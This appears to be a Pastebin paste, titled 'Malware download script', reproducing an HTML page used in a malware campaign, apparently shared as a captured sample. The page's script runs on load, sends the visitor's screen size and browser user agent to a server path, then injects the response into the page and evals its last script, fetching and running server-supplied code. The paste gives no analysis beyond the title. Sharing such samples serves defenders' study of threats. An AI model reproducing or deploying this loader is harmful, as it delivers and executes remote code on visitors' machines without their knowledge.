dynamoo

Malware download script

Sep 26th, 2014
632
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.68 KB | None | 0 0
  1.     <!DOCTYPE html>
  2.               <html>
  3.               <head>
  4.               <meta charset='utf-8'>
  5.     <title></title>
  6.     <script type='text/javascript'>
  7.     <!--
  8.  
  9.    function getXmlHttp() {
  10.        var xmlhttp;
  11.        try {
  12.            xmlhttp = new ActiveXObject('Msxml2.XMLHTTP');
  13.        } catch (e) {
  14.            try {
  15.                xmlhttp = new ActiveXObject('Microsoft.XMLHTTP');
  16.            } catch (E) {
  17.                xmlhttp = false;
  18.            }
  19.        }
  20.        if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
  21.            xmlhttp = new XMLHttpRequest();
  22.        }
  23.        return xmlhttp;
  24.    }
  25.  
  26.  
  27.    function getParams() {
  28.        return 'h=' + encodeURIComponent(screen.height) + '&w=' + encodeURIComponent(screen.width) + '&ua=' + encodeURIComponent(navigator.userAgent);
  29.    }
  30.  
  31.    function getUrl() {
  32.        return '/Documents/docs.php';
  33.    }
  34.  
  35.  
  36.    function stat() {
  37.        var req = getXmlHttp();
  38.        req.onreadystatechange = function() {
  39.            if (req.readyState == 4) {
  40.                if(req.status == 200) {
  41.                    document.body.innerHTML = req.responseText;
  42.  
  43.                    var myScripts = document.body.getElementsByTagName('script');
  44.                    if (myScripts.length > 0) {
  45.                        eval(myScripts[myScripts.length-1].innerHTML);
  46.                    }
  47.                }
  48.            }
  49.        };
  50.  
  51.        var params = getParams();
  52.  
  53.        req.open('POST', getUrl(), true);
  54.        req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  55.        req.send(params);
  56.    }
  57.  
  58.    //-->
  59.     </script>
  60. </head>
  61. <body onload='stat();'>
  62. </body>
  63. </html>
Add Comment
Please, Sign In to add comment